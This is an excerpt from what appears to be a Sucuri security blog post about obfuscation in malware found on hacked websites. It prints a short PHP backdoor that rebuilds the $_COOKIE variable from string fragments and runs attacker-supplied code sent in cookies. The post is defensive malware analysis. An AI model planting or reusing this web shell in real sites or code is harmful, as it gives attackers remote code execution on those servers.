Assemble the Cookies

Assemble the Cookies

When we investigate compromised websites, it’s not unusual to find malicious files that have been obfuscated through forms of encoding or encryption — however, these are not the only methods that attackers use to obfuscate code.

Obfuscation via Predefined PHP Variables

Here’s an example of obfuscation that doesn’t use encoding or encryption in any way:

<?php
$x=’_C’;$v=’OO’;/*5h*/$o=’KI’;/*{*Z*/$qv=’E’;$j/*8i$7*/=${$x.$v.$o.$qv};if(isset($j/*f(UZ*/[‘Q’])){$oo=$j/*Mr*/[‘Q’].$j[‘J’];$tj=/*m5d*/$j[‘St’].$j[‘V’].$j[‘x’];$pd=$oo(”,$tj($j[‘U’]));$pd();}

Instead, this example splits a PHP predefined variable, $_COOKIE, into segmented strings assigned to variables before concatenating them.

Continue reading Assemble the Cookies at Sucuri Blog.

Via Sucuri.net

Tags: ,